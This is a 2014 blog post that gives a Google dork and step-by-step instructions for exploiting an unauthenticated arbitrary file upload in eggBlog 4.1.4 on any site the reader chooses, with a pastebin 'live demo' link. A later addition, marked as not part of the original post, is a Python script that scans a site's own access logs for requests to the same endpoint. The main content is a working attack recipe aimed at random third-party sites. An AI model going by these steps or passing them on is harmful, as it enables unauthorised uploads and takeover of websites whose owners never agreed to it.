Monday, June 30, 2014

Exploit eggBlog 414 Arbitrary File Upload


Dork:
"powered by eggBlog.net"

Exploit:
/_lib/openwysiwyg/addons/imagelibrary/insert_image.php?wysiwyg=

1- Copy the dork and paste it into Google

2- Choose any site

Exploiting Target

1- Paste the exploit at the end of the URL.

Example:

www.site.com/index.php?id=12

becomes

www.site.com/_lib/openwysiwyg/addons/imagelibrary/insert_image.php?wysiwyg=

and you will see something like this:

[screenshot]

2- Choose your file and click Upload.

3- To view your file, simply click on your file name in the upper right box.

Live Demo: http://pastebin.com/Py0rcFWa
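
For site owners checking whether this endpoint has been requested on their own server, here is an added example (not part of the original post) that scans web-server access logs for the image-library path shown above. The combined log format, the sample log lines and all function names are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Path taken from the post; everything else in this script is an assumption.
UPLOAD_ENDPOINT = "/_lib/openwysiwyg/addons/imagelibrary/insert_image.php"

# Apache/nginx "combined" access-log format (assumed).
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def normalize_path(target):
    """Drop the query string, decode %-escapes, collapse '//' and lower-case."""
    path = unquote(target.split("?", 1)[0])
    return re.sub(r"/{2,}", "/", path).lower()

def find_upload_hits(lines):
    """Return {ip: {"probes", "views", "uploads"}} for requests to the endpoint."""
    hits = defaultdict(lambda: {"probes": 0, "views": 0, "uploads": 0})
    for line in lines:
        m = LINE_RE.match(line)
        # endswith() also catches installs in a sub-directory such as /blog/.
        if not m or not normalize_path(m["target"]).endswith(UPLOAD_ENDPOINT):
            continue
        if not m["status"].startswith("2"):
            kind = "probes"      # addon missing or blocked; someone is scanning
        elif m["method"] == "POST":
            kind = "uploads"     # form submitted; review the upload directory
        else:
            kind = "views"       # upload form was served to this client
        hits[m["ip"]][kind] += 1
    return dict(hits)

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [30/Jun/2014:10:01:02 +0000] "GET /_lib/openwysiwyg/addons/imagelibrary/insert_image.php?wysiwyg= HTTP/1.1" 200 2310 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [30/Jun/2014:10:01:40 +0000] "POST /blog/_lib/openwysiwyg/addons/imagelibrary/insert%5Fimage.php?wysiwyg= HTTP/1.1" 200 2402 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [30/Jun/2014:10:05:11 +0000] "GET /_lib/openwysiwyg/addons/imagelibrary/insert_image.php?wysiwyg= HTTP/1.1" 404 310 "-" "curl/7.30"',
    '192.0.2.4 - - [30/Jun/2014:10:06:00 +0000] "GET /index.php?id=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, counts in sorted(find_upload_hits(SAMPLE_LOG).items()):
        print(ip, counts)
```

Any client with a non-zero `uploads` count warrants a review of the files written around that time; removing or access-restricting the `imagelibrary` addon closes the unauthenticated path.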
